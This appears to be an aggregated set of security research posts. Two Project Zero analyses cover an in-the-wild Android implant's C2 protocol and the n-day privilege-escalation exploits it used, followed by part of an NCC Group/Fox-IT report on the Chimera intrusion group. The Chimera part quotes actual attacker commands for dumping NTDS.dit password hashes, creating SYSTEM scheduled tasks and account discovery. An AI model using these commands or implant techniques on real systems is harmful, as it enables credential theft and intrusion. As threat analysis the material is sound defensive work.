The whole point of this binary is to download the next stage from the command and control (C2) server. Once the previous unpacking steps and checks are completed, the binary will begin preparing the network communications. First the binary will perform a DNS test, then gather device information, and send the POST request to the C2 server. If all these steps are successful, it will receive back the next stage and prepare to execute that.

DNS Test

Prior to reaching out to the C2 server, the binary performs a DNS test. It takes a pointer to the decrypted data block as its argument. First the function generates a random hostname that is between 8-16 lowercase latin characters. It then calls getaddrinfo on this random hostname. It’s trying to find a host that will cause getaddrinfo to return EAI_NODATA, meaning that no address information could be found for that host. It will attempt 3 different addresses before it will bail if none of them return EAI_NODATA. Some disconnected analysis sandboxes will respond to all hostnames and so the code is trying to detect this type of malware analysis environment.

Once it finds a hostname that returns EAI_NODATA, stage 3 does a DNS query with that hostname. The DNS server address is found in the decrypted block in argument 1 at offset 0x14C7. In this binary that is 8.8.8.8:53, the Google DNS server. The code will connect to the DNS server via a socket and then send a Type A query for the randomly generated host name and parse the response. The only acceptable response from the server is NXDomain, meaning “Non-Existent Domain”.  If the code receives back NXDomain from the DNS server, it will proceed with the code path that communicates with the C2 Server.

Handshake with the C2 Server

The C2 server hostname and port is read from the decrypted data block. The port number is at offset 0x84 and the hostname is at offset 0x4.

The binary first connects via a socket to the C2 server, then connects with SSL/TLS. The SSL/TLS certificate, a root certificate, is also in the decrypted data block at offset 0x4C7. The binary uses the OpenSSL library.

Collecting the Data to Send

Once it successfully connects to the C2 server via SSL/TLS, the binary will then begin collecting all the device information that it would like to send to the C2 server. The code collects A LOT of data to be sent to the C2 server.  Six different sets of information are collected, formatted, compressed, and encrypted prior to sending to the remote server. The different “sets” of data that are collected are:

  • Device characteristics
  • Application information
  • Phone location information
  • Implant status
  • Running processes
  • Logging  (error & informational) messages

Device Characteristics

For this set, the binary is collecting device characteristics such as the Android version, the serial number, model, battery temperature, st_mode of /dev/mem and /dev/kmem, the contents of /proc/net/arp and /proc/net/route, and more. The full list of device characteristics that are collected and sent to the server are documented here.

The binary uses a few different methods for collecting this data. The most common is to read system properties. They have 2 different ways to read system properties:

  • Call __system_property_get by doing dlopen(/system/lib/libc.so) and dlsym('__system_property_get').
  • Executing getprop in popen

To get the device ID, subscriber ID, and MSISDN, the binary uses the service call shell command. To call a function from a service using this API, you need to know the code for the function. Basically, the code is the number that the function is listed in the AIDL file. This means it can change with each new Android release. The developers of this binary hardcoded the service code for each android SDK version from 8 (Froyo) through 29 (Android 10). For example, the getSubscriberId code in the iphonesubinfo service is 3 for Android SDK version 8-20, the code is 5 for SDK version 21, and the code is 7 for SDK versions 22-29.

The code also collects detailed networking information. For example, it collects the MAC address and IP address for each interface listed under the /sys/class/net/ directory.

Application Information

To collect information about the applications installed on the device, the binary will send all of the contents of /data/system/packages.xml to the C2 server. This XML file includes data about both the user-installed and the system-installed packages on the device.

Phone Location Information

To gather information about the physical location of the device, the binary runs dumpsys location in a shell. It sends the full output of this data back to the C2 server. The output of the dumpsys location command includes data such as the last known GPS locations.

Implant Status

The binary collects information about the status of the exploits and subsequent stages (including this one) to send back to the C2 server. Most of these values are obtained from the hash storage table. There are 22 value pairs that are sent back to the server. These values include things such as the installation time and the “repair count”, the build id, and the major and minor version numbers for the binary. The full set of data that is sent to the C2 server is available here.

Running Processes

The binary sends information about every single running process back to the C2 server. It will iterate through each directory under /proc/ and send back the following information for each process:

  • Name
  • Process ID (PID)
  • Parent’s PID
  • Groups that the process belongs to
  • Uid
  • Gid

Logging Information

As described in the Error Processing section, whenever the binary encounters an error, it creates an error message. The binary will send a maximum of 0x1F of these error messages back to the C2 server. It will also send a maximum of 0x1F “informational” messages back to the server. “Info” messages are similar to the error messages except that they are documenting a condition that is less severe than an error. These are distinctions that the developers included in their coding.

Constructing the Request

Once all of the “sets” of information are collected, they are compressed using the deflate function. The compressed “messages” each have the following compressedMessage structure. The messageCode is a type of identification code for the information that is contained in the message. It’s calculated by calculating the crc32 value for the 0x10 bytes at offset 0x1CD8 in the decrypted data block and then adding the “identification code”.

struct compressedMessage {

    uint compressedDataLength;

    uint uncompressedDataLength;

    uint messageCode;

    BYTE * dataPointer;

    BYTE[4096] data;

};

Once each of the messages, or sets of data, have been individually compressed into the compressedMessage struct, the byte order is swapped to change the endianness and then the data is all encrypted using AES256. The key from the decrypted data block is used and the IV is a set of 0x10 random bytes. The IV is prepended to the beginning of the encrypted message.

The data is sent to the server as a POST request. The full header is shown below.

POST /api2/v9/pass HTTP/1.1

 User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SM-G600FY Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.3

Host: REDACTED:443

Connection: keep-alive

Content-Type:application/octet-stream

Content-Length:%u

Cookie: %s

The “Cookie” field is two values from the decrypted data block: sid and uid. The values for these two keys are base64 encoded values from the decrypted data block.

The body of the POST request is all of the data collected and compressed in the section above. This request is then sent to the C2 server via the SSL/TLS connection.

Parsing the Response

The response received back from the server is parsed. If the HTTP Response Code is not 200, it’s considered an error. The received data is first decrypted using AES256. The key used is the key that is included in the decrypted data block at offset 0x48A and the IV is sent back as the first 0x10 bytes of the response. After being decrypted, the byte order is swapped using bswap32 and the data is then decompressed using inflate. This inflated response body is an executable file or a series of commands.

C2 Server Cookies

The binary will also store and delete cookies for the C2 server domain and the exploit server domain. First, the binary will delete the cookie for the hostname of the exploit server that is the following name/value pair: session=<XXX>. This name/value is hardcoded into the decrypted data block within the binary. Then it will re-add that same cookie, but with an updated last accessed time and expire time.

Executing the Next Stage

As stated previously, stage 3’s role in the exploit chain is to check that the binary is not being analyzed and if not, collect detailed device data and send it to the C2 server to receive back the next stage of code and commands that should be executed. The detailed information that is sent back to the C2 server is likely used for high-fidelity targeting.

The developers of stage 3 purposefully built in a variety of different ways that the next stage of code can be executed: a series of commands passed to system or a shared library ELF file which can be executed by calling dlopen and dlsym, and more. This section will detail the different ways that the C2 server can instruct stage 3 to save and begin executing the next stage of code.

If the POST request to the C2 server is successful, the code will receive back either an executable file or a set of commands which it’ll “process”.  The response is parsed differently based on the “message code” in the header of the response. This “message code” is similar to what was described in the “Constructing the Request” section. It’s an identification code + the CRC32 of the 0x10 bytes at 0x25E30. When processing the response, the binary calculates the CRC32 of these bytes again and subtracts them from the message code. This value is then used to determine how to treat the contents of the response. The majority of the message codes distinguish different ways for the response to be saved to the device and then be executed.

There are a few functions that are commonly used by multiple message codes, so they are described here first.

func1 - Writes the response contents to files in both the /data/dalvik-cache/arm and /mnt directories.

This function does the following:

  1. Writes the buffer of the response to /data/dalvik-cache/arm/<file name keyed by 0x10 in hashtable>
  2. Gets a filename from mkstemp(“/mnt/XXXXXX”)
  3. Write the buffer of the response to a file with the name from step #2 + “abc” concatenated to the end: /mnt/XXXXXXabc
  4. Write a specific value from memory to the file with the name from step #2 with “xyz” concatenated to the end: /mnt/XXXXXXxyz. This specific value can be changed through the 2nd function that is exported by the stage 3 binary: d.

func2 - Fork child process and inject code using ptrace.

This function forks a new process where the child will call the function init from an ELF library, then the parent will inject the code from the response into the child process using ptrace. The ELF library that is opened with dlopen and then init is called on is named /system/bin/%016lx%016lx with both values being the address of the buffer pointer.

func3 - Writes the buffer of the reply contents to file and sets the permissions and SELinux attributes.

This function will write the buffer to either the provided file path in the third argument or it will generate a new file path.  If it’s generating a new temporary file name, the code will go down the following list of directory names beginning with /cache in the first directory that it can stat, it will create the temporary file using mkstemp(“%s/XXXXXX”).

  • /cache
  • /mnt/secure/asec
  • /mnt/secure/staging
  • /mnt/secure
  • /mnt/obb
  • /mnt/asec
  • /mnt
  • /storage

After the new file is created, the code sets the permissions on the file path to those supplied to the function as the fourth argument. Then it will set the SELinux attributes of the file to those passed in in the fifth argument.

The following section gives a simplified summary of how the response from the C2 server is handled based on the response’s message code:

  • 0x270F: Return 0.
  • 0x2710: The response is a shared library ELF (ET_DYN). Call func2 to fork a child process and inject the ELF using ptrace.
  • 0x2711: The response is a shared library ELF (ET_DYN). Save the file to a temp file on the device and then call dlopen and dlsym(“init”) on the ELF. A child process is then forked. The child process calls init.
  • 0x2712: The response is an ELF file. The file is written to a temporary file on the device. A child process is forked and that child process executes by calling execve on the file.
  • 0x2713: The response is an ELF file.  The file is written to a temporary file on the device using func3. A child process is forked and that child process executes it by calling system on the file.
  • 0x2714: It forks a child process and that child process calls system(<response contents>).
  • 0x2715: The response is executable code and is mmaped. Certain series of bytes are replaced by the address of dlopen, dlsym, and a function in the binary. Then the code is executed.
  • 0x4E20: If (D1_ENV == 0 && the code can NOT fstat /data/dalvik-cache/arm/system@[email protected]), go into an infinite sleep. Else, set a variable to 1.
  • 0x4E21: The response/buffer is an ELF with type ET_DYN (.so file). If D1_ENV environment variable is set, call func2, which spawns the child process and injects the buffer’s code into it using ptrace. If D1_ENV is not set, write the buffer to the dalvik-cache and /mnt directories through func1.
  • 0x4E22: This message increments the “uninstall_time” variable in the hashtable. For the value that is at key 0xA0 in the hashtable, it will increment it by the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E23: This message sets the “uninstall_time” variable in the hashtable. It will set the value at key 0xA0 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E25: Set the value at the key 0x100 in the hashtable to the unsigned long value represented by the first 4 bytes in the response buffer.
  • 0x4E26: If the third argument (filepath) to the function that is processing these responses is not NULL and it doesn’t previously exist, make the directory and then set the file permissions and SELinux attributes on the directory to the values passed in as the 4th and 5th arguments.
  • 0x4E27: Write the response buffer to a temporary file using func3.
  • 0x4E28: Call rmdir on a filepath.
  • 0x4E29: Call rmdir on a filepath, if it doesn’t exist delete uierrors.txt.
  • 0x4E2A: Copy an additional decrypted block to the end of the data that is the value for key 0xE0 in the hash table.
  • 0x4E2B: If (D1_ENV == 0 && we can fstat /data/dalvik-cache/arm/system@[email protected]), set certain variables to 1.
  • 0x4E2C: If the buffer is a 64-bit ELF and D1_ENV == 0, call func1 to write the buffer to the dalvik-cache and /mnt directories.

Conclusion

That concludes our analysis of Stage 3 in the Android exploit chain. We hypothesize that each Stage 2 (and thus Stage 3) includes different configuration variables that would allow the attackers to identify which delivered exploit chain is calling back to the C2 server. In addition, due to the detailed information sent to the C2 prior to stage 4 being returned to the device it seems unlikely that we would successfully determine the correct values to have a “legitimate” stage 4 returned to us.

It’s especially fascinating how complex and well-engineered this stage 3 code is when you consider that the attackers used all publicly known n-days in stage 2. The attackers used a Google Chrome 0-day in stage 1, public exploit for Android n-days in stage 2, and a mature, complex, and thoroughly designed and engineered stage 3. This leads us to believe that the actor likely has more device-specific 0-day exploits.

This is part 5 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 6: Windows Exploits.

In-the-Wild Series: Android Exploits

By: Ryan
12 January 2021 at 17:37

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Posted by Mark Brand, Project Zero

A survey of the exploitation techniques used by a high-tier attacker against Android devices in 2020

Introduction

After one of the Chrome exploits has been successful, there are several (quite simple) stages of payload decryption that occur. Once we've got through that, we reach a much more complex binary that is clearly the result of some engineering work. Thanks to that engineering it's very simple for us to locate and examine the exploits embedded inside! For each privilege elevation, they have a function in the .init_array which will register it into a global list which they later use -- this makes it easy for them to plug-and-play additional exploits into their framework, but is also very convenient for us when reverse-engineering their framework:



Each of the "xyz_register" functions looks like the following, adding an entry to the global list with a probe function used to check whether the device is vulnerable to the given exploit, and to estimate likelihood of success, and an exploit function used to launch the exploit. These probe functions are then used to dynamically determine the best exploit to use based on runtime information about the target device.

 

Looking at the probe functions gives us an idea of which devices are supported, but we can already see something fairly surprising: this attacker is using entirely public exploits for their privilege elevations. Of course, we can't tell for sure that they didn't know about any of these bugs prior to the original public disclosures; but their exploit configuration structure contains an internal "name" describing the exploit, and those map very neatly to either public naming ("iovy", "cow") or CVE numbers ("0569", "0820" for exploits targeting CVE-2015-0569 and CVE-2016-0820 respectively), suggesting that these exploits were very likely developed after those public disclosures and not before.

In addition, as we'll see below, most of the exploits are closely related to public exploits or descriptions of techniques used to exploit the bugs -- adding further weight to the theory that these exploits were implemented well after the original patches were shipped.

Of course, it's important to note that we had a narrow window of opportunity during which we were capturing these exploit chains, and it wasn't possible for us to exhaustively test with different devices and patch levels. It's entirely possible that this attacker also has access to Android 0-day privilege elevations, and we just failed to extract those from the server before being detected. Nonetheless, it's certainly an interesting data-point to see an attacker pairing a sophisticated 0-day exploit for Chrome with, well, a load of bugs patched between 2 and 5 years ago.

Anyway, without further ado let's take a look at the exploits they did fit in here!

Common Techniques

addr_limit pipe kernel read-write: By corrupting the addr_limit variable in the task_struct, this technique gives a user-mode process the ability to read and write arbitrary kernel memory by passing kernel pointers when reading to and writing from a pipe.

Userspace shellcode: PXN support on 32-bit Android devices is quite rare, so on most 32-bit devices it was/is still possible to directly execute shellcode from the user-mode portion of the address space. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

Point to userspace memory: PAN support is not ubiquitous on 64-bit Android devices, so it was (on older Android versions) often possible even on 64-bit devices for a kernel exploit to use this technique. See KEEN Lab "Emerging Defense in Android Kernel" for more information.

iovy

The vulnerabilities:

CVE-2015-1805 is a vulnerability in the Linux kernel handling read/write for pipe iovectors, leading to the use of an out-of-bounds struct iovec.

CVE-2016-3809 is an information leak, disclosing the address of a kernel sock structure.

Strategy: Heap-spray with fake iovectors using sendmmsg, race write, readv and mmap/munmap to trigger the vulnerability. This produces a single-use kernel write-what-where.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then corrupt the socket member of the sock structure to point to userspace memory containing a fake structure (and function pointer table); execute userspace shellcode, elevating privileges.

Copy/Paste: ~90%. The exploit strategy is the same as public exploit code, and it looks like this was used as a starting point. The authors did some additional work, presumably to increase portability and stability, and the subsequent flow doesn't match any existing public exploit (that I found), but all of the techniques are publicly known.


Additional References: KEEN Lab "Talk is Cheap, Show Me the Code".

iovy_pxn2

The vulnerabilities: Same as iovy, plus:
P0-822 is an information leak, allowing the reading of arbitrary kernel memory.

Strategy: Same as above.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, and use P0-822 to leak the address of the function pointer table associated with the socket. Then use P0-822 again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~70%. The exploit strategy is the same as above, building the same primitive as the public exploit (addr_limit pipe kernel read-write). Instead of the public approach, they leverage the two additional vulnerabilities, which had public code available. It seems like the development of this exploit was copy/paste integration of the alternative memory-leak primitives, probably to increase portability. The code used for P0-822 is direct copy-paste (inner loop shown below).

iovy_pxn3

The vulnerabilities: Same as iovy.

Strategy: Heap-spray with pipe buffers. One thread each for read/write/readv/writev and the usual mmap/munmap thread. Modify all of the pipe buffers, and then run either "read and writev" or "write and readv" threads to get a reusable kernel read-write.

Subsequent flow: Use CVE-2016-3809 to leak the kernel address of a sock structure, then use kernel-read to leak the address of the function pointer table associated with the socket. Use kernel-read again to leak the necessary details to build a JOP chain that will clear the addr_limit. Corrupt one of the function pointers to invoke the JOP chain, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: ~30%. The heap-spray technique is the same as another public exploit, but there is significant additional synchronization added to support multiple reads and writes. There's not really enough unique commonality to determine whether the authors started with that code as a reference or not.

0569

The vulnerability: According to the release notes, CVE-2015-0569 is a heap overflow in Qualcomm's wireless extension IOCTLs. This appears to be where the exploit name is derived from; however as you can see at the Qualcomm advisory, there were actually 15 commits here under 3 CVEs, and the exploit appears to actually target one of the stack overflows, which was patched as CVE-2015-0570.

Strategy: Corrupt return address; return to userspace shellcode.

Subsequent flow: The shellcode corrupts addr_limit, giving the addr_limit pipe kernel read-write. Overwrite the cred struct for the current process, elevating privileges.

Copy/Paste: 0%. This bug is trivial to exploit for non-PXN targets, so there would be little to gain by borrowing code.

Additional References: KEEN Lab "Rooting every Android".

0820

The vulnerability: CVE-2016-0820, a linear data-section overflow resulting from a lack of bounds checking.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the KEEN Lab presentation.

Copy/Paste: ~20%. The only public code we could find for this is the PoC attached to our bugtracker - it seems most likely that this was an independent implementation written after KEEN lab's presentation and based on their description.

Additional References: KEEN Lab "Rooting every Android".

COW

The vulnerability: CVE-2016-5195, also known as DirtyCOW.

Strategy: Depending on the system configuration their exploit will choose between using /proc/self/mem or ptrace for the write thread.

Subsequent flow: There are several different exploitation strategies depending on the target environment, and the full exploitation process here is a fairly complex state-machine involving several hops into different processes, which is likely necessary to support launching the exploit from within an isolated app context.

Copy/Paste: ~5%. The basic code necessary to exploit CVE-2016-5195 was probably copied from one of the many public sources, but the majority of the complexity here is in what is done next, and this doesn't seem to be similar to any of the public Android exploits.

9568

The vulnerability: CVE-2018-9568, also known as WrongZone.

Strategy & subsequent flow: This exploit follows exactly the strategy and flow described in the Baidu Security Lab blog post.

Copy/Paste: ~20%. The code doesn't seem to match the publicly available exploit code for this bug, and it seems most likely that this was an independent implementation written after Baidu's blog post and based on their description.

Additional References: Alibaba Security "From Zero to Root". 
Baidu Security Lab: "KARMA shows you offense and defense".

Conclusion

Nothing very interesting, which is interesting in itself!

Here is an attacker who has access to 0day vulnerabilities in Chrome and Windows, and the ability to develop new and very reliable exploitation techniques in order to exploit these vulnerabilities -- and yet their Android privilege elevation capabilities appear to consist entirely of exploits using public, documented techniques and n-day vulnerabilities.

It certainly seems like they have the capability to write Android exploits. The exploits seem to be based on publicly available source code, and their implementations are based on exploitation strategies described in public sources.

One explanation for this would be that they serve different payloads depending on the targeting, and we were only receiving a "low-value" privilege-elevation capability. Alternatively,  perhaps exploit server URLs that we had access to were specifically configured for a user that they know uses an older device that would be vulnerable to one of these exploits?

Based on all the information available, it's likely that they have more device-specific 0day exploits. We might just not have tested with a device/firmware version that they supported for those exploits and inadvertently missed their more modern exploits.

About the only solid conclusion that we can make is that attackers clearly still see value in developing and maintaining exploits for fairly old Android vulnerabilities, to the extent of supporting those devices long past when their original manufacturers provide support for them.

This is part 4 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To continue reading, see In The Wild Part 5: Android Post-Exploitation.

Abusing cloud services to fly under the radar

12 January 2021 at 13:53

tl;dr

NCC Group and Fox-IT have been tracking a threat group with a wide set of interests, from intellectual property (IP) from victims in the semiconductors industry through to passenger data from the airline industry.

In their intrusions they regularly abuse cloud services from Google and Microsoft to achieve their goals. NCC Group and Fox-IT observed this threat actor during various incident response engagements performed between October 2019 until April 2020. Our threat intelligence analysts noticed clear overlap between the various cases in infrastructure and capabilities, and as a result we assess with moderate confidence that one group was carrying out the intrusions across multiple victims operating in Chinese interests.

In open source this actor is referred to as Chimera by CyCraft.

NCC Group and Fox-IT have seen this actor remain undetected, their dwell time, for up to three years. As such, if you were a victim, they might still be active in your network looking for your most recent crown jewels.

We contained and eradicated the threat from our client’s networks during incident response whilst our Managed Detection and Response (MDR) clients automatically received detection logic.

With this publication, NCC Group and Fox-IT aim to provide the wider community with information and intelligence that can be used to hunt for this threat in historic data and improve detections for intrusions by this intrusion set.

Throughout we use terminology to describe the various phases, tactics, and techniques of the intrusions standardized by MITRE with their ATT&CK framework . Near the end of this article all the tactics and techniques used by the adversary are listed with links to the MITRE website with more information.

From initial access to defense evasion: how it is done

In all the intrusions we have observed they are performed in similar ways by the adversary: from initial access all the way to actions on objectives. The objective in these cases appear to be stealing sensitive data from the victim’s networks.

Credential theft and password spraying to Cobalt Strike

This adversary starts with obtaining usernames and passwords of their victim from previous breaches. These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remotes services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator-accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control.

Network discovery and lateral movement

The adversary continues their discovery of the victim’s network from patient zero. Various scans and queries are used to find proxy settings, domain controllers, remote desktop services, Citrix services, and network shares. If the obtained valid account is already member of the domain admins group, the first lateral move in the network is usually to a domain controller where the adversary also deploys a Cobalt Strike beacon. Otherwise, a jump host or other system likely used by domain admins is found and equipped with a Cobalt Strike beacon. After this the adversary dumps the domain admin credentials from the memory of this machine, continues lateral moving through the network, and places Cobalt Strike beacons on servers for increased persistent access into the victim’s network. If the victim’s network contains other Windows domains or different network security zones, the adversary scans and finds the trust relationships and jump hosts, attempting to move into the other domains and security zones. The adversary is typically able to perform all the steps described above within one day.

During this process, the adversary identifies data of interest from the network of the victim. This can be anything from file and directory-listings, configuration files, manuals, email stores in the guise of OST- and PST-files, file shares with intellectual property (IP), and personally identifiable information (PII) scraped from memory. If the data is small enough, it is exfiltrated through the command and control channel of the Cobalt Strike beacons. However, usually the data is compressed with WinRAR, staged on another system of the victim, and from there copied to a OneDrive-account controlled by the adversary.

After the adversary completes their initial exfiltration, they return every few weeks to check for new data of interest and user accounts. At times they have been observed attempting to perform a degree of anti-forensic activities including clearing event logs, time stomping files, and removing scheduled tasks created for some objectives. But this isn’t done consistently across their engagements.

Framing the adversary’s work in the MITRE ATT&CK framework

Credential access (TA0006)

The earliest and longest lasting intrusion by this threat we observed, was at a company in the semiconductors industry in Europe and started early Q4 2017. The more recent intrusions took place in 2019 at companies in the aviation industry. The techniques used to achieve access at the companies in the aviation industry closely resembles techniques used at victims in the semiconductors industry.

The threat used valid accounts against remote services: Cloud-based applications utilizing federated authentication protocols. Our incident responders analysed the credentials used by the adversary and the traces of the intrusion in log files. They uncovered an obvious overlap in the credentials used by this threat and the presence of those same accounts in previously breached databases. Besides that, the traces in log files showed more than usual login attempts with a username formatted as email address, e.g.<username>@<email domain>. While usernames for legitimate logins at the victim’s network were generally formatted like <domain>\<username>. And attempted logins came from a relative small set of IP-addresses.

For the investigators at NCC Group and Fox-IT these pieces of evidence supported the hypothesis of the adversary achieving credentials access by brute force, and more specifically by credential stuffing or password spraying.

Initial access (TA0001)

In some of the intrusions the adversary used the valid account to directly login to a Citrix environment and continued their work from there.

In one specific case, the adversary now armed with the valid account, was able to access a document stored in SharePoint Online, part of Microsoft Office 365. This specific document described how to access the internet facing company portal and the web-based VPN client into the company network. Within an hour after grabbing this document, the adversary accessed the company portal with the valid account.

From this portal it was possible to launch the web-based VPN. The VPN was protected by two-factor authentication (2FA) by sending an SMS with a one-time password (OTP) to the user account’s primary or alternate phone number. It was possible to configure an alternate phone number for the logged in user account at the company portal. The adversary used this opportunity to configure an alternate phone number controlled by the adversary.

By performing two-factor authentication interception by receiving the OTP on their own telephone number, they gained access to the company network via the VPN. However, they also made a mistake during this process within one incident. Our hypothesis is that they tested the 2FA-system first or selected the primary phone number to send a SMS to. However the European owner of the account received a text message with Simplified Chinese characters on the primary phone number in the middle of the night Eastern European Time (EET). NCC Group and Fox-IT identified that the language in the text-message for 2FA is based on the web browser’s language settings used during the authentication flow. Thus the 2FA code was sent with supporting Chinese text.

Account discovery (T1087)

With access into the network of the victim, the adversary finds a way to install a Cobalt Strike beacon on a system of the victim (see Execution). But before doing so, we observed the adversary checking the current permissions of the obtained user account with the following commands:

net user
net user Administrator
net user <username> /domain
net localgroup administrators

If the user account doesn’t have local administrative or domain administrative permissions, the adversary attempts to discover which local or domain admin accounts exist, and exfiltrates the admin’s usernames. To identify if privileged users are active on remote servers, the adversary makes use of PsLogList from Microsoft Sysinternals to retrieve the Security event logs. The built-in Windows quser-command to show logged on users is also heavily used by them. If such a privileged user was recently active on a server the adversary executes Cobalt Strike’s built-in Mimikatz to dump its password hashes.

Privilege escalation (TA0004)

The adversary started a password spraying attack against those domain admin accounts, and successfully got a valid domain admin account this way. In other cases, the adversary moved laterally to another system with a domain admin logged in. We observed the use of Mimikatz on this system and saw the hashes of the logged in domain admin account going through the command and control channel of the adversary. The adversary used a tool called NtdsAudit to dump the password hashes of domain users as well as we observed the following command:

msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv

Note: the adversary renamed ntdsaudit.exe to msadcs.exe.

But we also observed the adversary using the tool ntdsutil to create a copy of the Active Directory database NTDS.dit followed by a repair action with esentutl to fix a possible corrupt NTDS.dit:

ntdsutil "ac i ntds" "ifm" "create full C:\Windows\Temp\tmp" q q
esentutl /p /o ntds.dit

Both ntdsutil and esentutl are by default installed on a domain controller.

A tool used by the adversary which wasn’t installed on the servers by default, was DSInternals. DSInternals is a PowerShell module that makes use of internal Active Directory features. The files and directories found on various systems of a victim match with DSInternals version 2.16.1. We have found traces that indicate DSInternals was executed and at which time, which match with the rest of the traces of the intrusion. We haven’t recovered traces of how the adversary used DSInternals, but considering the phase of the intrusion the adversary used the tool, it is likely they used it for either account discovery or privilege escalation, or both.

Execution (TA0002)

The adversary installs a hackers best friend during the intrusion: Cobalt Strike. Cobalt Strike is a framework designed for adversary simulation intended for penetration testers and red teams. It has been widely adopted by malicious threats as well.

The Cobalt Strike beacon is installed in memory by using a PowerShell one-liner. At least the following three versions of Cobalt Strike have been in use by the adversary:

  • Cobalt Strike v3.8, observed Q2 2017
  • Cobalt Strike v3.12, observed Q3 2018
  • Cobalt Strike v3.14, observed Q2 2019

Fox-IT has been collecting information about Cobalt Strike team servers since January 2015. This research project covers the fingerprinting of Cobalt Strike servers and is described in Fox-IT blog “Identifying Cobalt Strike team servers in the wild”. The collected information allows Fox-IT to correlate Cobalt Strike team servers, based on various configuration settings. Because of this, historic information was available during this investigation. Whenever a Cobalt Strike C2 channel was identified, Fox-IT performed lookups into the collection database. If a match was found, the configuration of the Cobalt Strike team server was analysed. This configuration was then compared against the other Cobalt Strike team servers to check for similarities in for example domain names, version number, URL, and various other settings.

The adversary heavily relies on scheduled tasks for executing a batch-file (.bat) to perform their tasks. An example of the creation of such a scheduled task by the adversary:

schtasks /create /ru "SYSTEM" /tn "update" /tr "cmd /c c:\windows\temp\update.bat" /sc once /f /st 06:59:00

The batch-files appear to be used to load the Cobalt Strike beacon, but also to perform discovery commands on the compromised system.

Persistence (TA0003)

The adversary loads the Cobalt Strike beacon in memory, without any persistence mechanisms on the compromised system. Once the system is rebooted, the beacon is gone. The adversary is still able to have persistent access by installing the beacon on systems with high uptimes, such as server. Besides using the Cobalt Strike beacon, the adversary also searches for VPN and firewall configs, possibly to function as a backup access into the network. We haven’t seen the adversary use those access methods after the first Cobalt Strike beacons were installed. Maybe because it was never necessary.

After the first bulk of data is exfiltrated, the persistent access into the victim’s network is periodically used by the adversary to check if new data of interest is available. They also create a copy of the NTDS.dit and SYSTEM-registry hive file for new credentials to crack.

Discovery (TA0007)

The adversary applied a wide range of discovery tactics. In the list below we have highlighted a few specific tools the adversary used for discovery purposes. You can find a summary of most of the commands used by the adversary to perform discovery at the end of this article.

Account discovery tool: PsLogList
Command used:

psloglist.exe -accepteula -x security -s -a <date>

This command exports a text file with comma separated fields. The text files contain the contents of the Security Event log after the specified date.

Psloglist is part of the Sysinternals toolkit from Mark Russinovich (Microsoft). The tool was used by the adversary on various systems to write events from the Windows Security Event Log to a text file. A possible intent of the adversary could be to identify if privileged users are active on the systems. If such a privileged user was recently active on a server the actor executes Cobalt Strike’s built-in Mimikatz to dump its credentials or password hash.

Account discovery tool: NtdsAudit
Command used:

msadcs.exe "NTDS.dit" -s "SYSTEM" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv

It imports the specified Active Directory database NTDS.dit and registry file SYSTEM and exports the found password hashes into RecordedTV_pdump.txt and user details in RecordedTV_users.csv.

The NtdsAudit utility is an auditing tool for Active Directory databases. It allows the user to collect useful statistics related to accounts and passwords. The utility was found on various systems of a victim and matches the NtdsAudit.exe program file version v2.0.5 published on the GitHub project page.

Network service scanning
Command used:

get -b <start ip> -e <end ip> -p
get -b <start ip> -e <end ip>

Get.exe appears to be a custom tool used to scan IP-ranges for HTTP service information. NCC Group and Fox-IT decompiled the tool for analysis. This showed the tool was written in the Python scripting language and packed into a Windows executable file. Though Fox-IT didn’t find any direct occurrences of the tool on the internet, the decompiled code showed strong similarities with the source code of a tool named GetHttpsInfo. GetHttpsInfo scans the internal network for HTTP & HTTPS services. The reconnaissance tool getHttpsInfo is able to discover HTTP servers within the range of a network.

The tool was shared on a Chinese forum around 2016.

Figure 1: Example of a download location for GetHttpsInfo.exe

Lateral movement (TA0008)

The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. The adversary attempts to move to a domain controller as soon as possible after getting foothold into the victim’s network. They continue lateral movement and discovery in an attempt to identify the data of interest. This could be a webserver to carve PII from memory, or a fileserver to copy IP, as we have both observed.

At one customer, the data of interest was stored in a separate security zone. The adversary was able to find a dual homed system and compromise it. From there on they used it as a jump host into the higher security zone and started collecting the intellectual property stored on a file server in that zone.

In one event we saw the adversary compromise a Linux-system through SSH. The user account was possibly compromised on the Linux server by using credential stuffing or password spraying: Logfiles on the Linux-system show traces which can be attributed to a credential stuffing or password spraying attack.

Lateral tool transfer (T1570)

The adversary is applying living off the land techniques very well by incorporating default Windows tools in its arsenal. But not all tools used by the adversary are so called lolbins: As said before, they use Cobalt Strike. But they also rely on a custom tool for network scanning (get.exe), carving data from memory, compression of data, and exfiltrating data.

